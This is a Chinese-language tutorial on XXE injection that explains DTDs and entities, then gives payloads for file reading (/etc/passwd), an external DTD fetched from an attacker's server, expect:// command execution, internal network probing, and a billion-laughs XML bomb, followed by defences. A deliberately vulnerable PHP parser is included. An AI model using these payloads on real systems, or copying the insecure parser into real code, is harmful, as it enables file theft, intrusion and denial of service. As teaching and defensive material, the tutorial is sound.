XML外部实体注入漏洞——XXE简单分析

发布时间:2026/7/4 10:11:44
XML外部实体注入漏洞——XXE简单分析 前言XXE漏洞经常出现在CTF中一直也没有系统的学习过今天就来总结一波。一、XXE 漏洞是什么XXE 漏洞全称XML External Entity Injection即 XML 外部实体 注入漏洞。XXE 漏洞发生在应用程序解析 XML输入时没有禁止外部实体的加载导致可加载恶意外部文件和代码造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起 Dos攻击等危害。二、XML基础知识想要了解 XXE漏洞需要先了解一下关于 XML的基础知识。1、XML是什么XML全称可扩展标记语言Extensible Markup Language。XML是独立于软件和硬件的信息传输工具它把数据从HTML中分离。 XML语言没有预定义的标签需要作者定义自己的标签和自己的文档结构。XML 被设计用来传输和存储数据HTML 被设计用来显示数据。2、XML文档结构XML文档结构包括XML声明DTD 文档类型定义可选文档元素。示例代码其中 DTD (Document Type Definition即文档类型定义部分 定义了XML文档的标签以及元素属性。如上图中的DTD 就定义了XML的根元素为 note然后根元素下面有一些子元素 (to,from,heading,body)那么下面的文档元素就可以使用这些元素!--文档元素--notetoDave/tofromTom/fromheadReminder/headbodyYou are a good man/body/note注PCDATA可被解析的字符数据。PCDATA 数据类型是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。文本中的标签会被当作标记来处理而实体会被展开。与之对应的是CDATACDATA不被解析的字符数据CDATA 数据类型是不会被解析器解析的文本在这些文本中的标签不会被当作标记来对 待其中的实体也不会被展开。详细可点这 链接DTD声明方式其中DTD有两种构建方式分别为内部 DTD声明和外部 DTD声明。1、内部DTD声明声明格式!DOCTYPE根元素[元素声明]如 上例使用就是内部 DTD声明。2、外部DTD声明通过引入 dtd文件的方式进行声明这一点和 cssjavascript 很像。声明格式!DOCTYPE根元素SYSTEM文件名例?xml version1.0?!DOCTYPEnoteSYSTEMtest.dtdnotetoH/tofromE/fromheadL/headbodyLO/body/notetest.dtd!ELEMENTto(#PCDATA)!--定义to元素为”#PCDATA”类型--!ELEMENTfrom(#PCDATA)!--定义from元素为”#PCDATA”类型--!ELEMENThead(#PCDATA)!--定义head元素为”#PCDATA”类型--!ELEMENTbody(#PCDATA)!--定义body元素为”#PCDATA”类型--说完了 DTD的两种引入方式终于到了关键人物 实体 登场了。实体的声明实体定义在 DTD声明中例?xml version1.0?!DOCTYPEsss[!ELEMENTsssANY!ENTITYxxehello]这里定义元素为 ANY 表示可以接受任何元素作为标签这里的xxe就是我们所说的实体了相当于一个变量可以在XML文档元素中使用符号对实体进行引用。例sssuserxxe;/userpasspass/pass/sss到时候输出的时候xxe;就会被hello替换。实体的分类1、按声明位置分和上面的内外部引入DTD声明不同别弄混了实体是定义在 DTD 中的可分为外部实体和内部实体上面的例子就是内部实体外部实体就是把实体定义在外部文件中。例?xml version1.0?!DOCTYPEsss[!ELEMENTsssANY!ENTITY xxe SYSTEM file:///D:/test.dtd //引入外部dtd文件]sssuserxxe;/userpasspass/pass/sss这样当需要更改实体的值时只需要更改外部的 dtd 文件就行不需要打开源码更改了降低了耦合性但也带来了安全漏洞。外部实体支持http、file等协议。不同程序支持的协议不同2、按类型分实体又分为通用实体和参数实体。1、通用实体用实体名;引用在DTD 中定义内外DTD都行在 XML文档元素中引用。上面的例子都是通用实体。2、参数实体使用% 实体名(中间有空格) 在DTD中定义内外DTD都行并且只能在DTD中使用%实体名;引用。在 DTD 文件中参数实体的声明可以引用其他实体参数实体和通用实体。引入格式内部引入!ENTITY%实体名称实体的值例?xmlversion1.0encodingutf-8!DOCTYPEAuthor[!ENTITY%firstHello!ENTITY%second%first;_World%second;]%second;会解析为Hello_World外部引入!ENTITY%实体名称SYSTEMURI例!DOCTYPEa[!ENTITY % name SYSTEM file:///D:/test.dtd %name;]三、如何利用XXE说了这么多终于来到了重点正如标题 XXE名为 “外部实体注入”也就是说时是通过引入外部实体的方式进行注入的。我们先来看这个例子?xml version1.0?!DOCTYPEs[!ELEMENTsANY!ENTITY xxe SYSTEM file:///D:/test.dtd ]suserxxe;/userpasspass/pass/s既然能读 dtd文件那是不是将路径换成敏感文件的路径也能把敏感文件读出来例解析 xml 的php文件test.php:?phplibxml_disable_entity_loader(false);$xmlfilefile_get_contents(php://input);$domnewDOMDocument();$dom-loadXML($xmlfile,LIBXML_NOENT|LIBXML_DTDLOAD);$credssimplexml_import_dom($dom);echo$creds;?构造payload:?xml version1.0 encodingutf-8?!DOCTYPEA[!ENTITY a SYSTEM file:///c:/windows/system.ini]Aa;/A可以看到成功读取到了 C盘下的system.ini文件此漏洞就是任意文件读取漏洞。四、XXE漏洞常见的危害1、任意文件读取构造任意文件读取漏洞 playload 有下面几种方法方式一、直接通过外部实体声明XML内容?xml version1.0 encodingutf-8?!DOCTYPEa[!ENTITY b SYSTEM file:///etc/passwd]ab;/a上面的例子就是此方式这是最简单的XXE漏洞利用。方式二、外部实体声明 通用实体 外部 DTD文件XML内容?xml version1.0?!DOCTYPEaSYSTEMhttp://XXX/test.dtdcb;/c注意这里的 http://XXX/test.dtd 是攻击者自己服务器上的文件。test.dtd 内容!ENTITYbSYSTEMfile:///etc/passwd示例(使用的是 xxe-labs 靶场的php环境)因为这里使用windows演示的所以读取的是system.ini文件可以看到成功的读取到了。方式三、外部实体声明参数实体 引入外部实体声明因为参数实体可以嵌套别的实体所以产生了这种方式。?xml version1.0?!DOCTYPEa[!ENTITY % d SYSTEM http://XXX/test.dtd %d;]cb;/ctest.dtd 内容:!ENTITYbSYSTEMfile:///etc/passwd示例注意这种方式必须要先引用 参数实体才能引用通用实体且缺一不可。2、命令执行在安装 expect扩展的PHP环境里执行系统命令其他协议也有可能可以执行系统命令。因为PHP的 expect 并不是默认安装扩展所以命令执行比较难利用但不排除有幸运的情况。?xml version1.0 encodingutf-8?!DOCTYPExxe[!ELEMENTnameANY!ENTITY xxe SYSTEM expect://cat / ]rootnamexxe;/name/root3、内网探测XML 外部实体中是可以使用http://协议可以利用该请求去探查内网。?xml version1.0 encodingutf-8?!DOCTYPExxe[!ELEMENTnameANY!ENTITY xxe SYSTEM http://127.0.0.1:80 ]rootnamexxe;/name/root4、攻击内网网站?xml version1.0 encodingutf-8?!DOCTYPExxe[!ELEMENTnameANY!ENTITY xxe SYSTEM http://127.0.0.1:80/payload ]rootnamexxe;/name/root5、发起Dos攻击几乎所有可以控制服务器资源利用的东西都可用于制造DOS攻击。通过XML外部实体注入攻击者可以发送任意的HTTP请求因为解析器会解析文档中的所有实体所以如果实体声明层层嵌套的话在一定数量上可以对服务器器造成DoS。常见的XML炸弹?xml version1.0?!DOCTYPElolz[!ENTITYlollol!ENTITYlol2lol;lol;lol;lol;lol;lol;lol;lol;lol;lol;!ENTITYlol3lol2;lol2;lol2;lol2;lol2;lol2;lol2;lol2;lol2;lol2;!ENTITYlol4lol3;lol3;lol3;lol3;lol3;lol3;lol3;lol3;lol3;lol3;!ENTITYlol5lol4;lol4;lol4;lol4;lol4;lol4;lol4;lol4;lol4;lol4;!ENTITYlol6lol5;lol5;lol5;lol5;lol5;lol5;lol5;lol5;lol5;lol5;!ENTITYlol7lol6;lol6;lol6;lol6;lol6;lol6;lol6;lol6;lol6;lol6;!ENTITYlol8lol7;lol7;lol7;lol7;lol7;lol7;lol7;lol7;lol7;lol7;!ENTITYlol9lol8;lol8;lol8;lol8;lol8;lol8;lol8;lol8;lol8;lol8;]lolzlol9;/lolz攻击原理XML解析器尝试解析该文件时DTD中的实体会以指数级的数量级展开lol 实体为 “lol” 字符串然后一个 lol2 实体引用了 10 次 lol 实体一个 lol3 实体引用了 10 次 lol2 实体此时一个 lol3 实体就含有10^2个 “lol” 了以此类推lol9 实体含有10^8个 “lol” 字符串所以这个1K不到的文件经过解析后会占用到3G的内存,可见有多恐怖不过现代的服务器软硬件大多已经抵御了此类攻击。防御XML炸弹的方法也很简单禁止DTD或者是限制每个实体的最大长度。五、XXE 如何防御方式一、使用开发语言提供的禁用外部实体的方法PHPlibxml_disable_entity_loader(true);JAVA:DocumentBuilderFactorydbfDocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);Pythonfromlxmlimportetree xmlDataetree.parse(xmlSource,etree.XMLParser(resolve_entitiesFalse))方式二、过滤用户输入过滤用户提交的XML数据 关键词!DOCTYPE、!ENTITY、SYSTEM、PUBLIC。最后关于 XXE漏洞的总结大致就这些了后面遇到新的 XXE利用方式再补上。( •̀ ω •́ )✧